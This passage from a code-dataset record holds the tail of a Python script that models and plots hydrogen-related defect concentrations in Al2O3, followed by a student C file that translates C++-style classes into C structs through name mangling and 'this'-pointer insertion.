final_VAlH[8,i]\n final_IO[:,[i]] = IO_fix\n final_IAl[:,[i]] = IAl_fix\n return (Ef,delE,f,final_h,final_e,final_IH,final_VAlH,final_VOH,final_VO,final_VAl,final_IO,final_IAl)\n\"\"\"\n****************************MAIN BODY******************************************\n\"\"\"\nDOS = np.loadtxt(\"dosperfect.txt\") # DOS from VASP\nDOS[:,1] = DOS[:,1]/24 # spin-up DOS per formula unit of Al2O3\nDOS[:,2] = DOS[:,2]/24 # spin-down DOS per formula unit of Al2O3\n# n,charge,num_O,num_Al,num_H,E_defect,NsiteNconfig,E_MP\nKV_Hi = np.loadtxt(\"onlyHi.txt\",skiprows=1) # 3x8, only Hi DFT 
details\n# n,charge,num_O,num_Al,num_H,num_Mg,num_Fe,num_Ti,num_Cr,num_Si,E_defect,num_site,E_MP\nKV_iso = np.loadtxt(\"isolated.txt\",skiprows=1) # 30x13, all defect details\n# n,charge,num_O,num_Al,num_H,num_Mg,num_Fe,num_Ti,num_Cr,num_Si,E_defect,num_site,E_MP\nKV_complex = np.loadtxt(\"complex.txt\",skiprows=1) # 36x13, all defect details\n# n,charge,num_O,num_Al,Nconf,concentration\nfixednative = np.loadtxt(\"fixed_native_conc.txt\",skiprows=1) # 14x6, conc of native defects from 1100K\n# n,charge,num_O,num_Al,num_H,num_Mg,num_Fe,num_Ti,num_Cr,num_Si,Nconf,BE\nBE = np.loadtxt(\"binding_energies.txt\",skiprows=1) # binding energies 11x12\n# defining constants\nk = 8.6173303e-05 # Boltzmann constant in eV\nE_VBM = 5.795 # Valence band maximum in eV\nE_CBM = 11.638 # Conduction band minimum in eV\nrows_DOS = len(DOS) # number of rows in the array DOS\n# Ef ranges from 0 to Eg in eV\nEfa=0\nEfb=5.84\nVBM_line = find_VBM(rows_DOS, E_VBM)\nCBM_line = find_CBM(rows_DOS, E_CBM)\n# defining constants to calculate chemical potentials \nDFTE_H2 = -6.771 # DFT energy of H2 molecule in eV\nE_perf = -897.74454 # DFT energy in eV of perfect supercell of Al2O3\nu0_H2 = -0.31856664 # at 300 K (Temperature correction to u_H)\np0 = 1 # standard pressure in atm\nT = 300 # K\nlim = 16\nu_H = H_chempot(lim, DFTE_H2, u0_H2, k, T, p0)\n# calculating all final defect concentrations at all pH2 by using bisection method to solve\n# charge-neutrality equation \nfunc = final_f_Ef_conc(lim, VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex)\nEf = func[0]\ndelE = func[1]\nf = func[2]\nfinalh = func[3]\nfinale=func[4]\nfinalIH=func[5]\nfinalVAlH=func[6]\nfinalVOH=func[7]\nfinalVO=func[8]\nfinalVAl=func[9]\nfinalIO=func[10]\nfinalIAl=func[11]\np=np.array([[1e-15,1e-14,1e-13,1e-12,1e-11,1e-10,1e-09,1e-08,1e-07,1e-06,\n 
1e-05,1e-04,1e-03,1e-02,1e-01,1]])\nlogp=np.log10(p)\nlogh=np.log10(finalh)\nloge=np.log10(finale)\nlogVAl=np.log10(finalVAl)\nlogIH=np.log10(finalIH)\nlogVAlH=np.log10(finalVAlH)\nlogVOH=np.log10(finalVOH)\nlogVO=np.log10(finalVO)\nlogVAl=np.log10(finalVAl)\nlogIO=np.log10(finalIO)\nlogIAl=np.log10(finalIAl)\n#plt.figure(figsize=(3.84,2.95))\naxes=plt.gca()\naxes.set_xlim([-15,0])\naxes.set_ylim([-18,-4])\nfont = {'fontname':'Times New Roman','fontsize':7}\nplt.xlabel('logpH2 (atm)',**font)\nplt.ylabel('log[D] per f.u. Al2O3',**font)\nplt.plot(logp[0,:],logVO[0,:],color='#e41a1c',marker='.',label='VOx')\nplt.plot(logp[0,:],logVO[1,:],color='#e41a1c',marker='*',label='VO+1')\nplt.plot(logp[0,:],logVO[2,:],color='#e41a1c',marker='p',label='VO+2')\nplt.plot(logp[0,:],logVAl[0,:],color='#377eb8',marker='P',label='VAlx')\nplt.plot(logp[0,:],logVAl[1,:],color='#377eb8',marker='+',label='VAl-1')\nplt.plot(logp[0,:],logVAl[2,:],color='#377eb8',marker='x',label='VAl-2')\nplt.plot(logp[0,:],logVAl[3,:],color='#377eb8',marker='o',label='VAl-3')\nplt.plot(logp[0,:],logIO[0,:],color='#4daf4a',marker='X',label='IOx')\nplt.plot(logp[0,:],logIO[1,:],color='#4daf4a',marker='h',label='IO-1')\nplt.plot(logp[0,:],logIO[2,:],color='#4daf4a',marker='H',label='IO-2')\nplt.plot(logp[0,:],logIAl[0,:],color='#984ea3',marker='d',label='IAlx')\nplt.plot(logp[0,:],logIAl[1,:],color='#984ea3',marker='D',label='IAl+1')\nplt.plot(logp[0,:],logIAl[2,:],color='#984ea3',marker='s',label='IAl+2')\nplt.plot(logp[0,:],logIAl[3,:],color='#984ea3',marker='^',label='IAl+3')\nplt.plot(logp[0,:],logh[:,0],color='#ff7f00',marker='>',label='h')\nplt.plot(logp[0,:],loge[:,0],color='#ffff33',marker='<',label='e')\nplt.plot(logp[0,:],logIH[0,:],color='#a65628',marker='.',label='IH-1')\nplt.plot(logp[0,:],logIH[1,:],color='#a65628',marker='*',label='IHx')\nplt.plot(logp[0,:],logIH[2,:],color='#a65628',marker='p',label='IH+1')\nplt.plot(logp[0,:],logVOH[0,:],color='#f781bf',marker='P',label='VOHx')\nplt.plot(logp[
0,:],logVOH[1,:],color='#f781bf',marker='+',label='VOH+1')\nplt.plot(logp[0,:],logVAlH[0,:],color='#999999',marker='h',label='VAlH-3')\nplt.plot(logp[0,:],logVAlH[1,:],color='#999999',marker='H',label='VAlH-2')\nplt.plot(logp[0,:],logVAlH[2,:],color='#999999',marker='d',label='VAlH-1')\nplt.plot(logp[0,:],logVAlH[3,:],color='#999999',marker='D',label='VAlHx')\nplt.plot(logp[0,:],logVAlH[4,:],color='#999999',marker='s',label='VAlH+1')\nplt.plot(logp[0,:],logVAlH[5,:],color='#984ea3',marker='H',label='VAl2H-1')\nplt.plot(logp[0,:],logVAlH[6,:],color='#ff7f00',marker='^',label='VAl3Hx')\nplt.plot(logp[0,:],logVAlH[7,:],color='#ff7f00',marker='x',label='VAl4H+1')\nplt.plot(logp[0,:],logVAlH[8,:],color='#984ea3',marker='+',label='VAl5H+2')\nplt.legend(loc='upper left')\npylab.savefig('with_hydrogen_300K.png')\n\n'''\n\nplt.plot(logp[0,:],logVAlH[6,:],color='#7570b3',label='$[V_{Al}-3H]^{x}$',linewidth=2)\nplt.plot(logp[0,:],logVAlH[7,:],color='#000000',marker='>',markersize=5,label='$[V_{Al}-4H]^{.}')\nplt.plot(logp[0,:],logVAlH[2,:],color='#e6ab02',label='$[V_{Al}-H]^{,}$',linewidth=2)\nplt.plot(logp[0,:],logIH[2,:],color='#e41a1c',label='$H_i^.\"\\u0387\"$',linewidth=2)\nplt.plot(logp[0,:],logVAlH[3,:],color='#a6761d',label='$[V_{Al}-H]^{x}$',linewidth=2)\nax=plt.subplot(111)\nax.tick_params(axis='both', which='major', 
labelsize=7)\npylab.savefig('undoped_H_300K.png')\nconcH=sum(finalIH[:,(lim-1)])+sum(finalVOH[:,(lim-1)])+sum(finalVAlH[:,(lim-1)])\nlogconcH=np.log10(concH)\n\"\"\"\nplt.plot(logp[0,:],logVO[0,:],color='#e41a1c',marker='.',label='VOx')\nplt.plot(logp[0,:],logVO[1,:],color='#e41a1c',marker='*',label='VO+1')\nplt.plot(logp[0,:],logVO[2,:],color='#e41a1c',marker='p',label='VO+2')\nplt.plot(logp[0,:],logVAl[0,:],color='#377eb8',marker='P',label='VAlx')\nplt.plot(logp[0,:],logVAl[1,:],color='#377eb8',marker='+',label='VAl-1')\nplt.plot(logp[0,:],logVAl[2,:],color='#377eb8',marker='x',label='VAl-2')\nplt.plot(logp[0,:],logVAl[3,:],color='#377eb8',marker='o',label='VAl-3')\nplt.plot(logp[0,:],logIO[0,:],color='#4daf4a',marker='X',label='IOx')\nplt.plot(logp[0,:],logIO[1,:],color='#4daf4a',marker='h',label='IO-1')\nplt.plot(logp[0,:],logIO[2,:],color='#4daf4a',marker='H',label='IO-2')\nplt.plot(logp[0,:],logIAl[0,:],color='#984ea3',marker='d',label='IAlx')\nplt.plot(logp[0,:],logIAl[1,:],color='#984ea3',marker='D',label='IAl+1')\nplt.plot(logp[0,:],logIAl[2,:],color='#984ea3',marker='s',label='IAl+2')\nplt.plot(logp[0,:],logIAl[3,:],color='#984ea3',marker='^',label='IAl+3')\nplt.plot(logp[0,:],logh[:,0],color='#ff7f00',marker='>',label='h')\nplt.plot(logp[0,:],loge[:,0],color='#ffff33',marker='<',label='e')\nplt.plot(logp[0,:],logIH[0,:],color='#a65628',marker='.',label='IH-1')\nplt.plot(logp[0,:],logIH[1,:],color='#a65628',marker='*',label='IHx')\nplt.plot(logp[0,:],logIH[2,:],color='#a65628',marker='p',label='IH+1')\nplt.plot(logp[0,:],logVOH[0,:],color='#f781bf',marker='P',label='VOHx')\nplt.plot(logp[0,:],logVOH[1,:],color='#f781bf',marker='+',label='VOH+1')\nplt.plot(logp[0,:],logVAlH[0,:],color='#999999',marker='h',label='VAlH-3')\nplt.plot(logp[0,:],logVAlH[1,:],color='#999999',marker='H',label='VAlH-2')\nplt.plot(logp[0,:],logVAlH[2,:],color='#999999',marker='d',label='VAlH-1')\nplt.plot(logp[0,:],logVAlH[3,:],color='#999999',marker='D',label='VAlHx')\nplt.plot(log
p[0,:],logVAlH[4,:],color='#999999',marker='s',label='VAlH+1')\nplt.plot(logp[0,:],logVAlH[5,:],color='#984ea3',marker='H',label='VAl2H-1')\nplt.plot(logp[0,:],logVAlH[6,:],color='#ff7f00',marker='^',label='VAl3Hx')\nplt.plot(logp[0,:],logVAlH[7,:],color='#ff7f00',marker='x',label='VAl4H+1')\nplt.plot(logp[0,:],logVAlH[8,:],color='#984ea3',marker='+',label='VAl5H+2')\nplt.legend()\n\"\"\"\n\"\"\"\n#pylab.legend(loc='upper left')\n\n#ax=plt.subplot(111)\n\n# Shrink current axis by 20%\n#box = ax.get_position()\n#ax.set_position([box.x0, box.y0, box.width * 0.85, box.height])\n# Put a legend to the right of the current axis\n#ax.legend(loc='upper right',bbox_to_anchor=(1, 1))\n#ax.legend().draggable()\n\"\"\"\n'''" } ]
3
jsovernigo/cis2750-A4
https://github.com/jsovernigo/cis2750-A4
e4ea93c330ba68f8473d32a590b41add886cb4da
3b1fa5ac9b946deb44aeab30ab7d0867d84bf0a3
c14fd69e9bb5edc2a2dbef9f5e9ce98bd83a5989
refs/heads/master
2021-01-18T16:13:29.485393
2017-03-31T01:06:44
2017-03-31T01:06:44
86,729,026
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5739463567733765, "alphanum_fraction": 0.5857811570167542, "avg_line_length": 19.8614559173584, "blob_id": "7a1e5dcc8ad863cb3d07d3b7b0dfd1d37ce9e442", "content_id": "304af80d25563adbe6270bcfe635c08a40778bcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 23490, "license_type": "no_license", "max_line_length": 128, "num_lines": 1126, "path": "/classToStruct.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tThis file contains functions that are designed to operate on class-to-\n *\tstruct situations in a cc file, where the desided outcome is to produce\n *\ta working c file.\n *\n *\tThese functions aid in that transition.\n */\n#include \"classToStruct.h\"\n#include \"recognize.h\"\n#include \"parseFile.h\"\n#include <ctype.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\nchar* mangle(char* className, char* functionName, char* args)\n{\n\tunsigned int i;\n\n\tint numberOfArgs;\n\tint finalLength;\n\tint carg;\n\tint record;\n\n\tchar* finalName;\n\tchar* argLetters;\n\n\tif(className == NULL || functionName == NULL || args == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tcarg = 0;\n\trecord = 1;\n\tnumberOfArgs = nstrchr(args, ',') + 1;\n\n\n\t/*\n\t essentially, this creates the length of the new name, which will be:\n\t the original name, preceeded by the class name, followed by the first letter\n\t of all the parameters.\n\t */\n\tfinalLength = strlen(functionName) + strlen(className) + numberOfArgs;\n\n\tfinalName = malloc(sizeof(char) * finalLength + 1);\n\tif(finalName == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\targLetters = malloc(sizeof(char) * numberOfArgs + 1);\n\tif(argLetters == NULL)\n\t{\n\t\tfree(finalName);\n\t\treturn NULL;\n\t}\n\n\tfor(i = 0; i < strlen(args); i++) /* loop through the function name */\n\t{\n\t\tif(record == 1 && 
isalpha(args[i])) /* if we are currently seeking an argument first letter, and it is indeed a letter */\n\t\t{\n\t\t\targLetters[carg] = args[i]; /* get the argument */\n\t\t\tcarg++;\n\t\t\trecord = 0;\n\t\t}\n\t\telse if(args[i] == ',') /* else, if we are starting a new argument */\n\t\t{\n\t\t\trecord = 1;\n\t\t\tcontinue;\n\t\t}\n\t}\n\targLetters[carg] = '\\0'; /* ensure a null terminator after last argument. */\n\n\n\t/* this creates the final name out of the three parts. */\n\tstrcpy(finalName, className);\n\tstrcat(finalName, functionName);\n\tstrcat(finalName, argLetters);\n\n\t/* strcpy'd, so who cares about this now. */\n\tfree(argLetters);\n\n\treturn finalName;\n}\n\nint replaceClass(Vector* tokens)\n{\n\tint i;\n\tint numReplaced;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tnumReplaced = 0;\n\n\tfor(i = 0; i < tokens->length-1; i++) /* loop through the lines (tokens) of the program */\n\t{\n\t\t/* if we have found a token 'class' */\n\t\tif(strcmp((char*)tokens->contents[i], \"class\") == 0)\n\t\t{\n\t\t\tfree(tokens->contents[i]);\n\t\t\ttokens->contents[i] = malloc(sizeof(char) * 7);\n\t\t\tstrcpy((char*)tokens->contents[i], \"struct\");\n\t\t\tnumReplaced ++;\n\t\t}\n\t}\n\n\treturn numReplaced;\n}\n\nint addSelfReferences(Vector* tokens)\n{\n\tint i;\n\tint bracketCounter;\n\n\tchar* className;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\t/* this means we have found a class who's members need 'this' support added to them. 
*/\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint cStart;\n\t\t\tint cStop;\n\t\t\tint foundBracket;\n\t\t\tcStart = i;\n\n\t\t\tbracketCounter = 0;\n\n\t\t\tclassName = tokens->contents[i];\n\n\t\t\tfoundBracket = 0;\n\n\t\t\tfor(j = i; j < tokens->length; j++)\n\t\t\t{\n\t\t\t\tif(strcmp(tokens->contents[j], \"{\") == 0)\n\t\t\t\t{\n\t\t\t\t\tfoundBracket = 1;\n\t\t\t\t\tbracketCounter ++;\n\t\t\t\t}\n\t\t\t\t/* if we find a closing brace */\n\t\t\t\telse if(strcmp(tokens->contents[j], \"}\") == 0)\n\t\t\t\t{\n\t\t\t\t\tbracketCounter --;\n\t\t\t\t\tif(foundBracket == 1 && bracketCounter == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tcStop = j;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\t/* operates on each class individually, distributing the self pointer */\n\t\t\tdistributeThis(tokens, className, cStart, cStop);\n\t\t}\n\t}\n\treturn 0;\n}\n\nint distributeThis(Vector* tokens, char* className, int classStart, int classStop)\n{\n\tint i;\n\tint bracketLevel;\n\tVector* classVariables;\n\n\tbracketLevel = 0;\n\tclassVariables = makeVector(7);\n\n\t/* collect class variables first */\n\tfor(i = classStart; i < classStop; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t{\n\t\t\tbracketLevel ++;\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t{\n\t\t\tbracketLevel --;\n\t\t}\n\n\t\tif(isFunction(tokens, i))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\tif(bracketLevel == 1 && isVariable(tokens,i))\n\t\t{\n\t\t\tappendString(classVariables, tokens->contents[i], strlen(tokens->contents[i]));\n\t\t}\n\t}\n\n\t/* now modify the member functions that reference the class variables. 
*/\n\tfor(i = classStart; i < classStop; i++)\n\t{\n\t\t/* this is a member function if we enter this block */\n\t\tif(isFunction(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint fStart;\n\t\t\tint fStop;\n\t\t\tint bStart;\n\t\t\tint foundBracket;\n\t\t\tint bracketCounter;\n\n\t\t\tVector* functionArgs;\n\n\t\t\tfStart = i;\n\t\t\tbracketCounter = 0;\n\t\t\tfoundBracket = 0;\n\n\t\t\t/* loop through the tokens from this point and store the function starts and stops */\n\t\t\tfor(j = i; j < classStop; j++)\n\t\t\t{\n\t\t\t\tif(strcmp(tokens->contents[j], \"{\") == 0)\n\t\t\t\t{\n\t\t\t\t\tif(foundBracket == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tbStart = j;\n\t\t\t\t\t\tfoundBracket = 1;\n\t\t\t\t\t}\n\t\t\t\t\tbracketCounter ++;\n\t\t\t\t}\n\t\t\t\telse if(strcmp(tokens->contents[j], \"}\") == 0)\n\t\t\t\t{\n\t\t\t\t\tbracketCounter --;\n\t\t\t\t\tif(foundBracket == 1 && bracketCounter == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tfStop = j;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\n\t\t\tfunctionArgs = getParams(tokens, fStart);\n\n\t\t\t/* this goes through the function body and replaces the class variables with this-> */\n\t\t\taddThisRef(tokens, classVariables, functionArgs, bStart, fStop);\n\n\t\t\t/* adds class <cname> * this to the function's arguments. */\n\t\t\tclassStop += addThisArg(tokens, className, fStart, bStart);\n\t\t\t\n\t\t\t\n\t\t\tdestroyVector(functionArgs);\n\t\t}\n\t}\n\n\tdestroyVector(classVariables);\n\treturn 0;\n}\n\nVector* getParams(Vector* tokens, int funcStart)\n{\n\tint i;\n\n\tVector* argNames;\n\n\targNames = makeVector(3);\n\n\t/* loops through the strings starting at the bracket after the class name. */\n\tfor(i = funcStart + 1; i < tokens->length; i++)\n\t{\n\t\t/* if we found the end of the args */\n\t\tif(strcmp(tokens->contents[i], \")\") == 0)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tif(isValidName(tokens->contents[i]))\n\t\t{\n\t\t\t/* we found a variable!! 
*/\n\t\t\tappendString(argNames, tokens->contents[i], strlen(tokens->contents[i]));\n\t\t}\n\t}\n\n\treturn argNames;\n}\n\nint addThisArg(Vector* tokens, char* className, int fStart, int bStart)\n{\n\tint i;\n\tint j;\n\tint argEnd;\n\tchar* space;\n\tchar* comma;\n\tchar* classWord;\n\tchar* cnameToken;\n\tchar* pointerToken;\n\tchar* thisToken;\n\n\tif(className == NULL || tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tfor(i = bStart; i >= 0; i--)\n\t{\n\t\tif(strcmp(tokens->contents[i], \")\") == 0)\n\t\t{\n\t\t\targEnd = i;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\t/* allocs the various variables that will be used to create a \"this\" pointer */\n\tspace = malloc(sizeof(char) * 2);\n\tcomma = malloc(sizeof(char) * 3);\n\tclassWord = malloc(sizeof(char) * 7);\n\tcnameToken = malloc(sizeof(char) * strlen(className) + 2);\n\tpointerToken = malloc(sizeof(char) * 5);\n\tthisToken = malloc(sizeof(char) * 6);\n\n\t/* adds the various terms to their strings */\n\tstrcpy(space, \" \");\n\tstrcpy(comma, \", \");\n\tstrcpy(classWord, \"class\");\n\tstrcpy(cnameToken, className);\n\tstrcpy(pointerToken, \" * \");\n\tstrcpy(thisToken, \"this \");\n\t\n\t/* inserts the tokens into the vector */\n\tinsert(tokens, thisToken, argEnd);\n\tinsert(tokens, pointerToken, argEnd);\n\tinsert(tokens, cnameToken, argEnd);\n\tinsert(tokens, space, argEnd);\n\tinsert(tokens, classWord, argEnd);\n\n\t/* if we have an arguement other than ours */\n\tfor(j = argEnd - 1; j >= 0; j--)\n\t{\n\t\t/* if we find an open bracket before another argument term */\n\t\tif(strcmp(tokens->contents[j], \"(\") == 0)\n\t\t{\n\t\t\t/* we dont need a comma */\n\t\t\tfree(comma);\n\t\t\treturn 5;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t{\n\t\t\t/* we need to insert a comma to separate the arguments */\n\t\t\tinsert(tokens, comma, j + 1);\n\t\t\treturn 6;\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nint addThisRef(Vector* tokens, Vector* classVariables, Vector* params, int fstart, int fstop)\n{\n\tint 
i;\n\tint numAdded;\n\n\tVector* localVars;\n\n\tlocalVars = makeVector(3);\n\tnumAdded = 0;\n\n\t/* loop through the tokens that represent this class function */\n\tfor(i = fstart; i < fstop; i++)\n\t{\n\t\tint j;\n\t\t/* this whole block here checks for local vars, so as to stop them being \"this'd\" */\n\t\tif(i - 1 >= 0)\n\t\t{\n\t\t\tif(isVariable(tokens, i))\n\t\t\t{\n\t\t\t\tappendString(localVars, tokens->contents[i], strlen(tokens->contents[i]));\n\t\t\t}\n\t\t}\n\t\t/* loop through the class variables we have found. */\n\t\tfor(j = 0; j < classVariables->length; j++)\n\t\t{\n\t\t\t/* if the token we are on matches a classVariable we are on */\n\t\t\tif(strcmp(tokens->contents[i], classVariables->contents[j]) == 0)\n\t\t\t{\n\t\t\t\tint k;\n\t\t\t\tint taken;\n\n\t\t\t\ttaken = 0;\n\t\t\t\t/* check if the token is found in the parameters for the function */\n\t\t\t\tfor(k = 0; k < params->length; k++)\n\t\t\t\t{\n\t\t\t\t\tif(strcmp(tokens->contents[i], params->contents[k]) == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\ttaken = 1;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* check if this token is represented in the local vars... */\n\t\t\t\tfor(k = 0; k < localVars->length; k++)\n\t\t\t\t{\n\t\t\t\t\tif(strcmp(tokens->contents[i], localVars->contents[k]) == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\ttaken = 1;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* if this flag is set, we know we have run into a local var or a param. 
*/\n\t\t\t\tif(taken == 1)\n\t\t\t\t{\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\telse if(isValidType(tokens->contents[i - 1]) == 0 && isValidName(tokens->contents[i - 1]) == 0)\n\t\t\t\t{\n\t\t\t\t\tchar* vname;\n\t\t\t\t\tvname = malloc(sizeof(char) * strlen(tokens->contents[i]) + 7);\n\t\t\t\t\tvname[0] = '\\0';\n\n\t\t\t\t\t/* prefix the name with this-> */\n\t\t\t\t\tstrcpy(vname, \"this->\");\n\t\t\t\t\tstrcat(vname, tokens->contents[i]);\n\n\t\t\t\t\tfree(tokens->contents[i]);\n\t\t\t\t\ttokens->contents[i] = vname;\n\t\t\t\t\tnumAdded ++;\n\n\t\t\t\t\t/* breaks out of the loop searching the classVariables */\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tdestroyVector(localVars);\n\treturn numAdded;\n}\n\nint mangleAllMembers(Vector* tokens)\n{\n\tint i;\n\tint inClass;\n\tint bracketCounter;\n\tchar* className;\n\n\tVector* classFunctions;\n\n\t/* loop through all tokens in the program */\n\tinClass = 0;\n\tbracketCounter = 0;\n\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tclassFunctions = makeVector(4);\n\n\t\t\tclassName = tokens->contents[i];\n\t\t\tinClass = 1;\n\t\t}\n\t\tif(inClass == 1)\n\t\t{\n\t\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t\t{\n\t\t\t\tbracketCounter ++;\n\t\t\t}\n\t\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t\t{\n\t\t\t\tbracketCounter --;\n\n\t\t\t\t/* we have broken out of a class */\n\t\t\t\tif(bracketCounter == 0)\n\t\t\t\t{\n\t\t\t\t\tinClass = 0;\n\t\t\t\t\tdestroyVector(classFunctions);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse if(isFunction(tokens, i))\n\t\t\t{\n\t\t\t\tint j;\n\t\t\t\tchar* fname;\n\t\t\t\tchar* args;\n\n\t\t\t\tchar* finalName;\n\t\t\t\t\n\t\t\t\tappendString(classFunctions, tokens->contents[i], strlen(tokens->contents[i]));\n\t\t\t\t\n\t\t\t\tfname = tokens->contents[i];\n\t\t\t\targs = malloc(sizeof(char)*512);\n\t\t\t\tif(args == NULL)\n\t\t\t\t{\n\t\t\t\t\treturn -1;\n\t\t\t\t}\n\t\t\t\targs[0] = '\\0';\n\t\t\t\tj = i+2;\n\t\t\t\t/* loop until we 
encounter a closing brace */\n\t\t\t\twhile(strcmp(tokens->contents[j], \")\") != 0)\n\t\t\t\t{\n\t\t\t\t\t/* this will only occur if there is a syntax error present in the file. (i.e. open bracket with no corresponding closed) */\n\t\t\t\t\tif(j >= tokens->length)\n\t\t\t\t\t{\n\t\t\t\t\t\treturn -1;\n\t\t\t\t\t}\n\t\t\t\t\t/* we don't want to include the opening bracket... */\n\t\t\t\t\tif(strcmp(tokens->contents[j], \"(\") != 0)\n\t\t\t\t\t{\n\t\t\t\t\t\t/* this adds on another part of the parameters, and then as pace to delimit them. */\n\t\t\t\t\t\tstrcat(args, (char*)tokens->contents[j]);\n\t\t\t\t\t\tstrcat(args, \" \");\n\t\t\t\t\t}\n\t\t\t\t\tj++;\n\t\t\t\t}\n\t\t\t\tfinalName = mangle(className, fname, args);\n\t\t\t\ttokens->contents[i] = finalName;\n\t\t\t\tfree(fname);\n\t\t\t\tfree(args);\n\t\t\t}\n\t\t\telse if(isFunctionCall(tokens, i))\n\t\t\t{\n\t\t\t\tint j;\n\t\t\t\tint needsMangling;\n\t\t\t\tneedsMangling = 0;\n\n\t\t\t\tfor(j = 0; j < classFunctions->length; j++)\n\t\t\t\t{\n\t\t\t\t\tif(strcmp(tokens->contents[i], classFunctions->contents[j]) == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tneedsMangling = 1;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* this actually mangles function calls. 
*/\n\t\t\t\tif(needsMangling)\n\t\t\t\t{\n\t\t\t\t\tint hasArgs;\n\t\t\t\t\tchar* finalName;\n\t\t\t\t\tchar* thisPointer;\n\n\t\t\t\t\tfinalName = malloc(sizeof(char)*256);\n\t\t\t\t\tfinalName[0] = '\\0';\n\t\t\t\t\thasArgs = 0;\n\n\t\t\t\t\tstrcat(finalName, className);\n\t\t\t\t\tstrcat(finalName, tokens->contents[i]);\n\n\t\t\t\t\t/* loop through the following tokens, looking for the closing brace of the function */\n\t\t\t\t\tfor(j = i + 1; j < tokens->length; j++)\n\t\t\t\t\t{\n\t\t\t\t\t\tchar temp[2];\n\t\t\t\t\t\ttemp[1] = '\\0';\n\t\t\t\t\t\tif(strcmp(tokens->contents[j], \")\") == 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tchar* thisParam;\n\n\t\t\t\t\t\t\tthisParam = malloc(sizeof(char) * 5);\n\t\t\t\t\t\t\tstrcpy(thisParam, \"this\");\n\t\t\t\t\t\t\tinsert(tokens, thisParam, j);\n\n\t\t\t\t\t\t\tif(hasArgs == 1)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tchar* comma;\n\t\t\t\t\t\t\t\tcomma = malloc(sizeof(char) * 2);\n\t\t\t\t\t\t\t\tstrcpy(comma, \",\");\n\t\t\t\t\t\t\t\tinsert(tokens, comma, j);\t\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t\t/* this means if tokens->contents is not present in \"(,\" */\n\t\t\t\t\t\telse if(strstr(\"(,\",tokens->contents[j]) == NULL)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\thasArgs = 1;\n\t\t\t\t\t\t\ttemp[0] = getTypeID(tokens, j);\n\t\t\t\t\t\t\tstrcat(finalName, temp);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tfree(tokens->contents[i]);\n\t\t\t\t\ttokens->contents[i] = finalName;\n\n\t\t\t\t\t/* insert a this pointer behind the function call */\n\t\t\t\t\tthisPointer = malloc(sizeof(char)*7);\n\t\t\t\t\tstrcpy(thisPointer, \"this->\");\n\n\t\t\t\t\tinsert(tokens, thisPointer, i);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn 0;\n}\n\nvoid migrateFunctions(Vector* tokens)\n{\n\tint i;\n\tint inClass;\n\tint bracketCounter;\n\tint foundBracket;\n\tint insertPos;\n\tVector* allFunctionTokens;\n\n\tinClass = 0;\n\tbracketCounter = 0;\n\tfoundBracket = 0;\n\tinsertPos = 0;\n\n\tallFunctionTokens = makeVector(50);\n\n\t/* loop, 
